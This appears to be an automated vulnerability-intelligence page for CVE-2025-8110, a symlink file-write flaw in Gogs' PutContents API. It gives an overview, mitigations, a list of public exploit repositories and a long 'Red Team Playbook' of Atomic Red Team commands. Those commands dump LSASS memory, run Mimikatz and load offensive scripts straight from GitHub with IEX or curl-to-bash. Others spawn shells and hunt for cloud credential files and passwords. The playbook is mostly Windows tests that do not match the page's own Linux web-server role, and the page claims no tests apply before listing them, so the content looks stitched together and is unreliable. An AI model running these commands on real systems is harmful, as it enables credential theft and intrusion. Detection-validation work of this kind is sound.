CVE-2025-8110
Overview
This vulnerability is a symbolic link (symlink) bypass flaw in the PutContents API of the Gogs self-hosted Git service. The root cause lies in improper handling of symlinks during file write operations, where the API fails to verify if the target file paths are symlinks pointing outside the intended repository directory. This allows authenticated users to manipulate file system paths, affecting the repository management component responsible for content storage.
Vulnerability Description
Improper Symbolic link handling in the PutContents API in Gogs allows Local Execution of Code.
Impact
An attacker with a low-privileged authenticated account can overwrite arbitrary files on the server by exploiting symlink handling flaws, enabling execution of arbitrary code with the privileges of the Gogs service. This can lead to full system compromise, including unauthorized access to sensitive data and lateral movement within the network. The vulnerability is actively exploited in the wild, increasing the risk of widespread breaches and persistent footholds on affected systems.
Solution
Gogs maintainers are developing a fix to properly validate symlink targets in the PutContents API to prevent path traversal outside the repository. Users should upgrade to versions later than 0.13.3 once released. Detailed patch instructions and updates are available through the Gogs project advisories and the referenced GitHub advisory (GHSA-mq8m-42gh-wq7r). Until a patch is available, restricting access to the API to trusted users and monitoring for suspicious file modifications is recommended.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in question arises from improper handling of symbolic links within the PutContents API of the Gogs platform, a widely used self-hosted Git service. This flaw allows an attacker with local access to execute arbitrary code on the server. Symbolic links, which serve as pointers to other files or directories, can be manipulated to redirect file operations to unintended locations. In this case, the API fails to adequately validate the paths of files being processed, enabling an attacker to exploit this oversight and gain unauthorized execution capabilities.
Exploitation of this vulnerability can occur through various attack vectors, primarily requiring local access to the Gogs server. An attacker could create a malicious symbolic link that points to sensitive system files or directories. When the PutContents API is invoked to write data, the API may inadvertently overwrite or execute code in these targeted locations. For example, if an attacker has access to a user account with permissions to invoke the API, they could craft a request that leads to the execution of shell commands or the alteration of critical configuration files, thereby compromising the integrity and security of the entire system.
The potential impact of this vulnerability on organizations using Gogs is significant. Given the CVSS score of 8.8, it indicates a high severity level, suggesting that successful exploitation could lead to severe consequences, including data breaches, unauthorized access to sensitive information, and disruption of services. For businesses, this could translate into financial losses, reputational damage, and regulatory penalties, especially if sensitive customer data is involved. The risk is further exacerbated in environments where Gogs is integrated with other systems, as the compromise of one service could lead to a cascading effect across the entire infrastructure.
To detect and mitigate this vulnerability, organizations should implement several strategies. Regularly updating the Gogs platform to the latest version is crucial, as developers typically release patches to address known vulnerabilities. Additionally, employing file integrity monitoring tools can help in identifying unauthorized changes to files and directories, providing an early warning system for potential exploitation attempts. Organizations should also enforce strict access controls to limit who can interact with the PutContents API, ensuring that only trusted users have the ability to execute potentially harmful operations. Finally, conducting regular security audits and penetration testing can help identify and remediate vulnerabilities before they can be exploited by malicious actors.
In conclusion, the improper handling of symbolic links in the PutContents API of Gogs presents a significant security risk that can lead to local code execution. The potential for exploitation underscores the importance of maintaining robust security practices, including timely updates, access controls, and proactive monitoring. By understanding the technical details, attack vectors, and real-world implications of this vulnerability, organizations can better prepare themselves to defend against potential threats and safeguard their critical assets.
CSURFACE threat intelligence has identified a marked escalation in exploitation activity targeting CVE-2025-8110, evidenced by the emergence of new proof-of-concept exploits that demonstrate both local and authenticated remote code execution capabilities against vulnerable Gogs instances. While our telemetry shows a slight decrease in the EPSS score, indicating a modest reduction in predicted exploit likelihood, the overall exploit landscape has expanded with multiple publicly available tools facilitating attack development and detection evasion. This divergence underscores a complex threat environment where attacker interest remains robust despite a short-term dip in exploitation probability metrics. The inclusion of CVE-2025-8110 in the KEV catalog further elevates its priority for defenders, signaling increased recognition of its operational relevance. Consequently, the risk posture associated with this vulnerability has intensified, warranting heightened vigilance as adversaries gain more accessible means to weaponize the flaw.
Update 2 — June 07, 2026
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2025-8110, accompanied by the emergence of additional proof-of-concept exploits that demonstrate both authenticated and local code execution vectors. This development broadens the attack surface and lowers the technical barriers for adversaries seeking to leverage the vulnerability. Our telemetry indicates a diversification in exploitation methods, suggesting that threat actors are actively refining their toolsets to evade detection and increase operational success. Although the EPSS score shows a slight downward trend, the increased volume and sophistication of exploits underscore a heightened threat environment. The inclusion of CVE-2025-8110 in the KEV catalog further validates its criticality, signaling that defenders must prioritize monitoring and response efforts. Collectively, these factors elevate the overall risk level, reflecting a shift toward more aggressive and accessible exploitation campaigns.
Update 3 — June 15, 2026
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2025-8110, reflected by a substantial increase in exploit attempts and a significant rise in the Exploit Prediction Scoring System (EPSS) score, which now places this vulnerability in the top percentile for exploitation likelihood. This surge coincides with the recent inclusion of CVE-2025-8110 in the Known Exploited Vulnerabilities (KEV) catalog, underscoring its elevated priority within the threat landscape. The proliferation of new proof-of-concept exploits and detection templates available on public repositories indicates that threat actors are accelerating efforts to weaponize this vulnerability, potentially lowering the barrier for widespread exploitation. For defenders, this intensification signals an urgent need to enhance monitoring and detection capabilities, as adversaries are increasingly leveraging these tools to achieve local code execution on vulnerable Gogs instances. Consequently, the threat level associated with CVE-2025-8110 has escalated from high to critical, reflecting both the growing exploitation momentum and the expanding availability of attack resources.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Gogs | Gogs | All |
cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (21)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
zAbuQasem/gogs-CVE-2025-8110
CVE-2025-8110 PoC
|
zAbuQasem | 28 | 0 | 2025-12-13 | View |
|
rxerium/CVE-2025-8110
Detection template for CVE-2025-8110
|
rxerium | 21 | 0 | 2025-12-11 | View |
|
TYehan/CVE-2025-8110-Gogs-RCE-Exploit
Gogs CVE-2025-8110 RCE Exploit
|
TYehan | 8 | 1 | 2026-04-12 | View |
|
Ghxstsec/CVE-2025-8110
|
Ghxstsec | 3 | 3 | 2026-04-11 | View |
|
joaquinrrr/CVE-2025-8110
PoC exploit for CVE-2025-8110
|
joaquinrrr | 5 | 0 | 2026-06-25 | View |
|
kayl22/cve-2025-8110-GOGS-RCE
GOGS RCE cve-2025-8110 python script that automates the whole attack chain of creating a repository with a symlink file ...
|
kayl22 | 4 | 0 | 2026-04-11 | View |
|
3jee/CVE-2025-8110
CVE-2025-8110 — Gogs <= 0.13.3 Arbitrary File Write via Symlink Traversal in PutContents API
|
3jee | 2 | 0 | 2026-04-11 | View |
|
AdityaInnovates/CVE-2025-8110-Gogs-RCE-Exploit
Gogs CVE-2025-8110 RCE Exploit
|
AdityaInnovates | 0 | 1 | 2026-04-30 | View |
|
0dgt/CVE-2025-8110
RCE exploit for Gogs <= 0.13.3
|
0dgt | 1 | 0 | 2026-04-12 | View |
|
George0Papasotiriou/CVE-2025-8110-Gogs-Remote-Code-Execution
|
George0Papasotiriou | 1 | 0 | 2026-02-10 | View |
|
amnsecurity/ghostlink-writeup
Ghostlink HTB — Full Chain AD + Gogs Exploitation | MQTT → NTLM Relay → Path Traversal → CVE-2025-8110 → ADCS ESC11 → DC...
|
amnsecurity | 0 | 0 | 2026-07-10 | View |
|
mananispiwpiw/CVE-2025-8110-PoC
CVE-2025-8110 Proof of Concept
|
mananispiwpiw | 0 | 0 | 2026-05-20 | View |
|
get-xor/coreweave-demo-2026-05
Verified vulnerability journey for CVE-2025-8110 (Gogs) and CVE-2025-3248 (Langflow) — risk triage, exploitability verif...
|
get-xor | 0 | 0 | 2026-05-20 | View |
|
hassan-hamadi/CVE-2025-8110-Silentium-HTB
CVE-2025-8110 Specifically for the Silentium box on HTB.
|
hassan-hamadi | 0 | 0 | 2026-04-17 | View |
|
X4BROZER/CVE-2025-8110
Gogs RCE PoC - CVE-2025-8110
|
X4BROZER | 0 | 0 | 2026-04-15 | View |
|
NetsecBandit/CVE-2025-8110-Exploit
|
NetsecBandit | 0 | 0 | 2026-04-14 | View |
|
popyue/CVE-2025-8110
Gogs Symlink Traversal → RCE
|
popyue | 0 | 0 | 2026-04-13 | View |
|
manbahadurthapa1248/CVE-2025-8110-Authenticated-Remote-Code-Execution-on-Gogs-v0.13.3-
A remote code execution to get a reverse shell on Gogs (v0.13.3)
|
manbahadurthapa1248 | 0 | 0 | 2026-04-12 | View |
|
111ddea/goga-cve-2025-8110
验证 Gogs 版本 0.13.2 是否存在 **CVE-2025-8110 (符号链接文件覆盖)** 漏洞。
|
111ddea | 0 | 0 | 2025-12-24 | View |
|
tovd-go/CVE-2025-8110
|
tovd-go | 0 | 0 | 2025-12-24 | View |
|
freiwi/CVE-2025-8110
🔍 Detect improper symbolic link handling in Gogs' PutContents API, exposing local code execution risks for versions 0.13...
|
freiwi | 0 | 0 | 2025-12-31 | View |
Threat Feed
10 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Deployed role: Linux · Web Server
Kill chain derived from the ML classifier. Pick the target OS above to see the OS-specific path and matching playbook.
Attack Vectors ML
MITRE ATT&CK Techniques (10)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
108 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
"#{procdump_exe}" -accepteula -mm lsass.exe #{output_file}
$exePath = resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
try{ IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1') -ErrorAction Stop}
catch{ $_; exit $_.Exception.Response.StatusCode.Value__}
get-process lsass | Out-Minidump
"#{procdump_exe}" -accepteula -ma lsass.exe #{output_file}
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
"#{dumpert_exe}"
#{xordump_exe} -out #{output_file} -x 0x41
if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\System32\rdrleakdiag.exe"
} elseif (Test-Path -Path "$env:SystemRoot\SysWOW64\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\SysWOW64\rdrleakdiag.exe"
} else {
$binary_path = "File not found"
exit 1
}
$lsass_pid = get-process lsass |select -expand id
if (-not (Test-Path -Path"$env:TEMP\t1003.001-13-rdrleakdiag")) {New-Item -ItemType Directory -Path $env:TEMP\t1003.001-13-rdrleakdiag -Force}
write-host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
& $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."
"#{venv_path}\Scripts\pypykatz" live lsa
#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
"#{psexec_exe}" #{remote_host} -accepteula -c #{command_path}
cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1
New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand
powershell.exe -e #{obfuscated_code}
# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
$malcmdlets = #{Malicious_cmdlets}
foreach ($cmdlets in $malcmdlets) {
"function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
$cmdlets}
New-PSSession -ComputerName #{hostname_to_connect}
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
try { Invoke-BloodHound -OutputDirectory $env:Temp }
catch { $_; exit $_.Exception.HResult}
Start-Sleep 5
write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5
#{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} --dc #{dc} --buildcache --cachefilename #{cachefilename}
#{soaphound_path} --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory #{outputdirectory}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
ldapdomaindump -u #{username} -p #{password} #{target_ip} -o /tmp/T1087
ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user} -w #{password} -b "CN=Users,DC=#{domain},DC=#{top_level_domain}" -s sub -a always -z 1000 dn
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc admincountdmp #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc exchaddresses #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=person) #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties
Invoke-Expression "#{adrecon_path}"
([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
net user administrator /domain
(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] OU Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] Domain Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
net user /domain
net group /domain
net user /domain
get-localgroupmember -group Users
get-aduser -filter *
query user /SERVER:#{computer_name}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
cd "PathToAtomicsFolder\..\ExternalPayloads"
.\kerbrute.exe userenum -d #{Domain} --dc #{DomainController} "PathToAtomicsFolder\..\ExternalPayloads\username.txt"
Get-ADComputer #{hostname} -Properties *
Get-adcomputer -SearchScope subtree -filter "name -like '*'" -Properties *
Get-ADComputer #{hostname} -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" *
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$target = $env:LOGONSERVER
$target = $target.Trim("\\")
$IpAddress = [System.Net.Dns]::GetHostAddresses($target) | select IPAddressToString -ExpandProperty IPAddressToString
wmic.exe /node:$IpAddress process call create 'wevtutil epl Security C:\\ntlmusers.evtx /q:\"Event[System[(EventID=4776)]]"'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
generaldomaininfo -noninteractive -consoleoutput
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (10)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-8110 |
| wiz.io |
GitHub CVE
|
http://wiz.io/blog/wiz-research-gogs-cve-2025-8110-rce-exploit |
| openwall.com |
NVD API
Mailing List
|
http://www.openwall.com/lists/oss-security/2025/12/11/3 |
| openwall.com |
NVD API
Mailing List
|
http://www.openwall.com/lists/oss-security/2025/12/11/4 |
| openwall.com |
NVD API
Mailing List
|
http://www.openwall.com/lists/oss-security/2026/01/17/4 |
| openwall.com |
NVD API
Mailing List
|
http://www.openwall.com/lists/oss-security/2026/01/18/1 |
| openwall.com |
NVD API
Mailing List
|
http://www.openwall.com/lists/oss-security/2026/01/18/2 |
| github.com |
NVD API
Patch
|
https://github.com/gogs/gogs/commit/553707f3fd5f68f47f531cfcff56aa3ec294c6f6 |
| github.com |
NVD API
Exploit
Issue Tracking
Patch
Vendor Advisory
|
https://github.com/gogs/gogs/pull/8078 |
| cisa.gov |
NVD API
Third Party Advisory
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-8110 |